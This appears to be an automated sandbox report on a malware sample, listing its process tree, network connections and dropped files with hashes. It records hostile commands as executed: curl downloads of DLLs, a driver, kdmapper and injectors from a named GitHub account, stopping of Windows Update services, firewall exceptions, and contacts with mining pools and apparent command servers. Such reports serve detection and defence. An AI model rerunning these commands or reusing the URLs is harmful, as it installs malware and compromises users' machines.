"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2928,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2940 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2944,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2960 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3400,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3896 /prefetch:9

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent > nul 2>&1

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent > nul 2>&1

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent > nul 2>&1

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent > nul 2>&1

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent > nul 2>&1

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\Files\Authenticator222.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Authenticator222.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\Files\csrss.exe

"C:\Users\Admin\AppData\Local\Temp\Files\csrss.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\Files\t.exe

"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\sysldsvp.exe

C:\Windows\sysldsvp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\sysldsvp.exe

C:\Windows\sysldsvp.exe

C:\Windows\sysldsvp.exe

C:\Users\Admin\AppData\Local\Temp\Files\856.exe

"C:\Users\Admin\AppData\Local\Temp\Files\856.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\Files\WinRarInstall.exe

"C:\Users\Admin\AppData\Local\Temp\Files\WinRarInstall.exe"

C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe

"C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\winrar-info.exe

"C:\Users\Admin\AppData\Local\Temp\winrar-info.exe"

C:\Users\Admin\AppData\Local\Temp\Files\crack.exe

"C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"

C:\Users\Admin\AppData\Local\Temp\winrar-x64-701ru.exe

"C:\Users\Admin\AppData\Local\Temp\winrar-x64-701ru.exe"

C:\Users\Admin\AppData\Local\Temp\Files\file.exe

"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"

C:\Windows\SysWOW64\Files\shopfree.exe

"C:\Windows\System32\Files\shopfree.exe"

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe

"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"

C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe

"C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe

C:\Windows\system32\timeout.exe

timeout /t 10 /nobreak

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\System32\sc.exe

C:\Windows\System32\sc.exe delete "VJAODQWN"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\856.exe" "856.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\856.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 1336

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
IN 3.6.115.64:18069 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 147.185.221.27:2676 go-dramatically.gl.at.ply.gg tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 69.42.215.252:80 freedns.afraid.org tcp
N/A 224.0.0.251:5353 udp
US 34.110.138.217:443 merino.services.mozilla.com udp
US 34.110.138.217:443 merino.services.mozilla.com tcp
DE 147.45.47.53:25084 tcp
US 8.8.8.8:53 cloudflare-dns.com udp
US 34.107.221.82:80 detectportal.firefox.com tcp
PL 54.37.232.103:10300 xmr-eu1.nanopool.org tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
CN 47.98.177.117:8888 tcp
GB 20.26.156.215:443 github.com tcp
US 34.117.59.81:443 ipinfo.io tcp
CN 101.200.220.118:8090 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 147.185.221.27:2676 go-dramatically.gl.at.ply.gg tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
DE 147.45.47.53:25084 tcp
US 104.21.90.85:80 mail.accessdnsl.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
CN 49.234.48.162:80 tcp
HU 45.227.252.199:7712 tcp
US 104.26.12.205:443 api.ipify.org tcp
GB 142.250.180.3:80 o.pki.goog tcp
CN 106.75.61.100:6699 tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
FR 141.94.96.144:3333 pool.supportxmr.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 147.185.221.27:2676 go-dramatically.gl.at.ply.gg tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 172.245.208.21:80 172.245.208.21 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
DE 147.45.47.53:25084 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
CN 47.113.74.51:443 zlonline.oss-cn-shenzhen.aliyuncs.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 142.250.187.206:443 docs.google.com tcp
N/A 192.168.190.133:4444 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
GB 142.250.180.3:80 o.pki.goog tcp
GB 142.250.200.1:443 drive.usercontent.google.com tcp
US 172.67.177.42:443 wlnrar.shop tcp
GB 142.250.180.3:80 o.pki.goog tcp
GB 142.250.180.3:80 o.pki.goog tcp
GB 20.26.156.215:443 github.com tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
KR 119.193.158.215:80 119.193.158.215 tcp
US 147.185.221.27:2676 go-dramatically.gl.at.ply.gg tcp
GB 20.26.156.215:443 github.com tcp
US 192.64.83.210:80 192.64.83.210 tcp

Files

memory/5520-0-0x0000000002360000-0x0000000002361000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe

MD5 2a94f3960c58c6e70826495f76d00b85
SHA1 e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512 fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

C:\ProgramData\Synaptics\Synaptics.exe

MD5 85e3d4ac5a6ef32fb93764c090ef32b7
SHA1 adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52
SHA256 4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1
SHA512 a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab

memory/3752-129-0x0000000072CBE000-0x0000000072CBF000-memory.dmp

memory/5520-127-0x0000000000400000-0x00000000004C5000-memory.dmp

memory/3752-134-0x00000000009A0000-0x00000000009A8000-memory.dmp

memory/3896-132-0x0000000002100000-0x0000000002101000-memory.dmp

memory/3752-135-0x00000000052A0000-0x000000000533C000-memory.dmp

memory/5524-252-0x0000000000400000-0x00000000004C5000-memory.dmp

C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe

MD5 0cf225d4e9a1a440b7f9194d56533598
SHA1 fb7446f256e389fe8f957ccb34422870b52fb233
SHA256 2c042ffcb4b89bf6a65195ca81430a0497a827c125b24aea15822302d4d76a59
SHA512 7e8efd8a96545b54762ad2d4998e55332f1162d007ce544b5d6aeb4112f1674924319b9a2369cbb90c08fddfe0549242bf9ac563e54c9ed11d0f633ae7a10853

C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe

MD5 090bc5a664b2714d24d5520fb4469536
SHA1 24d7e38ffd2513b998b60a19663247789d6c03fb
SHA256 05de6e9d2530d508683f41ce1c7fdfe6041de637f7e876c69a569edffb974560
SHA512 59f8660923c382b6577b0ef921e1e6cdcaf7d171e74a9b183e9312768dff05a2698a937c9fa0f088afcca03c3e69189f54d8c6f8bb88a2713eca0a678d1d6a30

memory/2672-277-0x0000000000620000-0x0000000000944000-memory.dmp

memory/2340-278-0x00007FF7C8210000-0x00007FF7C8220000-memory.dmp

memory/2340-279-0x00007FF7C8210000-0x00007FF7C8220000-memory.dmp

memory/2340-281-0x00007FF7C8210000-0x00007FF7C8220000-memory.dmp

memory/2340-280-0x00007FF7C8210000-0x00007FF7C8220000-memory.dmp

memory/2340-282-0x00007FF7C8210000-0x00007FF7C8220000-memory.dmp

memory/2340-283-0x00007FF7C5670000-0x00007FF7C5680000-memory.dmp

memory/2340-284-0x00007FF7C5670000-0x00007FF7C5680000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fven4uHX.xlsm

MD5 e566fc53051035e1e6fd0ed1823de0f9
SHA1 00bc96c48b98676ecd67e81a6f1d7754e4156044
SHA256 8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512 a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

memory/2672-287-0x000000001C3A0000-0x000000001C3F0000-memory.dmp

memory/2672-288-0x000000001C4B0000-0x000000001C562000-memory.dmp

C:\Windows\SysWOW64\Files\XClient.exe

MD5 f4f891e67d6e6f0d3fe5e78115730a7d
SHA1 dfe9b1f2098b8d146787eb2368e7161bdb4ac81d
SHA256 c73619c529306eb78f56d3f18bd9ef3f48d4c0a7896d8b874acb1673ab96a046
SHA512 0836f2d09f52d48b9cf30bb644f78d2b8b24153eb4bdb45a4e8732b14b1690d074139db0359d899fa7ccc29c763c0c3aaba33f2eb859375831a4393c1b7fe9a3

C:\Users\Admin\AppData\Local\Temp\Files\2r61ahry.exe

MD5 943590af47af06d1bca1570bc116b25d
SHA1 53eeb46310d02859984c6fa0787c5e6e3a274198
SHA256 d36de86e88ad124a4d4707dc60f136a6782f29af17f76f3714e37dec30f03201
SHA512 c3604262bcddc1bd092e29c17527d14f445ece56845b7a1596c735140a5590f947bc5796492f74fa1c673d3deeb69066de25a8ecd5f879ef6e15c44f0cf1f773

C:\Users\Admin\AppData\Local\Temp\BD875E00

MD5 6230ad8d63b6b2e27a7ca290c10b3ea4
SHA1 e711cc5319bb596e4e921f82942d0b4555e597fb
SHA256 b36ff8acf838af45ee19397ab9818581154be6486e537e23d191304986270c79
SHA512 91904c102ba15a5f234fbfd176c303b1a7ed1c70d1301061e69925aedf7fad0fdbdd65c62ddfc910d1e2d31745363ac411e29210a5bf0a1c62d9a763d29bca89

C:\Users\Admin\AppData\Local\Temp\Files\drchoe.exe

MD5 2a601bbfbfc987186371e75c2d70ef4e
SHA1 791cd6bdac91a6797279413dc2a53770502380ca
SHA256 204e8268d98a3584e7fda52820025c6b681fd5dca6da726512d3ea97fb4510d5
SHA512 1c3c6a4da8448fecaf917ca586ee6e069733c16e3477734b7548863dc81aa9ef9112a648fd38e3ea527766a19a9aac925c3a4d3531784ae9111386721bc79f3e

memory/5920-371-0x0000000000E00000-0x0000000000F7A000-memory.dmp

C:\Users\Admin\AppData\Roaming\d3d9x.dll

MD5 3890670c65b1527cf8afba9ff1bee930
SHA1 010961ead5ad7d49d200ccf9da59e6742fe9e20e
SHA256 526ab1133f4714c76a8ea39d1ea652b148af956e357a8644e9d063071782c0d1
SHA512 4acba818835f1014d7c1b54732760db361e5c5966980dcbbf15ac1a0c6c0467e56988cdc99dba5c41b427f24383857de69a5ccd34e907481575e863e007276bf

memory/3352-372-0x0000000000400000-0x00000000005E5000-memory.dmp

memory/4440-382-0x0000000000400000-0x0000000000452000-memory.dmp

memory/4440-383-0x0000000005D50000-0x00000000062F6000-memory.dmp

memory/4440-385-0x0000000005840000-0x00000000058D2000-memory.dmp

memory/4440-386-0x00000000057F0000-0x00000000057FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp96E1.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/4440-406-0x0000000006400000-0x0000000006476000-memory.dmp

memory/4440-418-0x0000000006C00000-0x0000000006C1E000-memory.dmp

memory/4440-435-0x0000000007240000-0x0000000007858000-memory.dmp

memory/4440-439-0x0000000006CD0000-0x0000000006CE2000-memory.dmp

memory/4440-466-0x0000000006EA0000-0x0000000006EEC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\datareporting\glean\pending_pings\a55044b0-8179-4924-9463-530daa860c58

MD5 9bf0e67dc91d0d06338b1a13f2810198
SHA1 5a2f1155e740ba56b7e3561d46eae76139d89b0a
SHA256 0f37c5464b3f9e2748773dcc6e414b7f268951dddcc9af2ea367a28267c23ee4
SHA512 6ee4f9ce7a35526b0b7989bbd31a597a7d3afe71c0a8be93ebea8a6e5307cfd8be35df5165ca18f8737e7a6229d3471138af04f619e8edb780c250118634dcbd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\datareporting\glean\pending_pings\983a4d49-dee9-4a8b-9f19-7641d3a2b59f

MD5 d47c5656332e8260be03e0d6d92e13b6
SHA1 4f2983a5c124ed0727d9b0f07db05425621b1f12
SHA256 ff12ffec00cf889109a54da9ec6da1a1fd125b4e6e03434f43e4ded7434ce6c9
SHA512 7c7f265e4b5979cecd1c9a7871a588e65ca51c26a80ef436401a01f7f0fbd8a52020098c95ad15154620de48806bc7995346d5a3e9bf4dda3e22563778510228

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\datareporting\glean\pending_pings\413ee298-74b3-4b3a-afc6-b5ade53a65a8

MD5 a4455d8d327b44612ce0ffdb4afc968c
SHA1 55629c888ebd2292fa8bbbd075a0de4911db43b0
SHA256 64012ba3c8473ce4c9fb7bc7bacdeb0da6693d2761f17ce536102a741f414eff
SHA512 c3d07533a02799bd32e7ef3e954e556b1997b72740ef6e151c8de9a5f1ca6f595bbc9c73bde4671c848ff59ce9a6e61d76eb5739c86404304e9ba62afd2b1b17

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\datareporting\glean\pending_pings\3480a844-d56a-4537-bc5d-138f2537a4c6

MD5 dae2ba16886f0be8f53880b299fe0cd4
SHA1 da5fe20b94d543b8b0b05105c008f060e91766de
SHA256 6cc55d80cc406658e7e1c0eac6b8da91484b65c5acf787e9fff610836390ff30
SHA512 76f3ab919d52a5c0dfffc7520487dfdb11398c85b6c63823ec50a5b49831a5ae01059036b85a802c4bf327993ee233fb2381d3042f0e3d51219b77aec9caed90

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\datareporting\glean\pending_pings\2c4c7d52-cc9c-47da-a7de-3e2bf8131694

MD5 2095e27e1bd9681d9ef0528eab665ebc
SHA1 3010cc51ace04cc34593e4a5d79b3c4cd9e88636
SHA256 492853c361018feb3eda00113d5ed7150409b4004a3026971f480c8b30b37fb0
SHA512 c1e3668d43257b1905a412f6892d579912145180f730dc68a105215501c88511d48ded2b2cb72c522d798006893f2b701a6895b96969ce9d359e0fa118167a8e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\prefs.js

MD5 1eb5b785546a93b158def8b7b3dbb456
SHA1 dee5b10165489ef7ea19efecd56c8d6f4e5ef491
SHA256 1feeb00c3b934e025f046564c13514bf1a86848df81ad4b0b2a759b38b0c9d7b
SHA512 d069c88d9cc0f3e51fdd610aeb0cfa5d77c5f830bb79fe1729adc67b5d79766aea44b3711e1a818a309bfb4092cbddab47ed310fed404a98d5d2c3c5fc620ad1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\datareporting\glean\pending_pings\128ca53e-5ef5-444f-b334-1f9e8750db84

MD5 c17bae713df316d7d38190c059409f2b
SHA1 9321fcae679aa06414f6d4037a8c9157bd67fdb3
SHA256 a19e11ca89499a6724ec86a221d21f2154dc92654e90c58e35b8fe763fe0daac
SHA512 60473065d314ad64535debb59144ebc27f17b564dfa2ca40bdab5affc1c28351ffa84ae36b3a57442d2c18b5c07a70eef4a680bcd630b0906c7692851b28be85

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\datareporting\glean\events\events

MD5 cb3c770a4309ea882e36a9178fa1739b
SHA1 3dbeac61b47477040bf067883b29ab86bdf5569b
SHA256 38bc82a88a99c89bf6f22012188e769a9f89563975a696e4af6aa5e577ad75c4
SHA512 ae3838f92f3519c0b96bd88bf5bd7bb1f53bc3ae0571acdf6087caa730c7bcefe9b4b000a1a8ccd4c9c7aab23240acb40df97cdef1edbe900b7593cb95aa6f83

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\datareporting\glean\db\data.safe.tmp

MD5 3bce5e6836bec70a4281bea357b681ae
SHA1 d6c71a996b49c2c30380f1361a777eb0275ab16a
SHA256 d8270ef3aef4b63e7b98c4c1e1b40ca84092d6e63b61d97550c869dd82822197
SHA512 ea117a5bfb3074660b176d1f9ef54b3a4e18025c03f894c0cc5c96e5e6a3184b8906eb18e3100fdee0e906e77bcc1dfc3fcef1a7399cd3d30503046a855e40f7

memory/3752-748-0x0000000072CBE000-0x0000000072CBF000-memory.dmp

memory/5540-755-0x0000000140000000-0x000000014000E000-memory.dmp

memory/5540-758-0x0000000140000000-0x000000014000E000-memory.dmp

memory/5540-754-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1440-760-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-762-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-763-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-765-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-767-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-770-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-771-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-769-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-768-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-766-0x00000000011E0000-0x0000000001200000-memory.dmp

memory/1440-764-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-759-0x0000000140000000-0x0000000140835000-memory.dmp

memory/1440-761-0x0000000140000000-0x0000000140835000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3crkgqbs.default-release\prefs-1.js

MD5 589c8c694456e47019630c43268b9a85
SHA1 9c63e38192b79ab97982873668ee84c7cb626bd8
SHA256 7ac3f9a68557a610a2d1bffd7f4ae12cf6c5a7dc4e268a20782b404f395c09af
SHA512 2f1e7fdec78831f28f875bba1ea2ccf8cfa42f65ea32ad372a1e36649123c31312988072dfb09bfab87154eaf09ff43f45779e98db9b661f8ee6562684be56fc

memory/3896-785-0x0000000002100000-0x0000000002101000-memory.dmp

memory/3896-784-0x0000000000400000-0x00000000004C5000-memory.dmp

memory/5540-753-0x0000000140000000-0x000000014000E000-memory.dmp

memory/5540-752-0x0000000140000000-0x000000014000E000-memory.dmp

memory/5540-751-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4440-448-0x0000000006D30000-0x0000000006D6C000-memory.dmp

memory/4440-438-0x0000000006D90000-0x0000000006E9A000-memory.dmp

memory/1440-863-0x0000000140000000-0x0000000140835000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\2020.exe

MD5 95606667ac40795394f910864b1f8cc4
SHA1 e7de36b5e85369d55a948bedb2391f8fae2da9cf
SHA256 6f2964216c81a6f67309680b7590dfd4df31a19c7fc73917fa8057b9a194b617
SHA512 fab43d361900a8d7f1a17c51455d4eedbbd3aec23d11cdb92ec1fb339fc018701320f18a2a6b63285aaafafea30fa614777d30cdf410ffd7698a48437760a142

C:\Users\Admin\AppData\Local\Temp\_MEI44602\base_library.zip

MD5 81cd6d012885629791a9e3d9320c444e
SHA1 53268184fdbddf8909c349ed3c6701abe8884c31
SHA256 a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd
SHA512 d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

C:\Users\Admin\AppData\Local\Temp\_MEI44602\python3.dll

MD5 ff319d24153238249adea18d8a3e54a7
SHA1 0474faa64826a48821b7a82ad256525aa9c5315e
SHA256 a462a21b5f0c05f0f7ec030c4fde032a13b34a8576d661a8e66f9ad23767e991
SHA512 0e63fe4d5568cd2c54304183a29c7469f769816f517cd2d5b197049aa966c310cc13a7790560ef2edc36b9b6d99ff586698886f906e19645faeb89b0e65adfdd

C:\Users\Admin\AppData\Local\Temp\_MEI44602\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

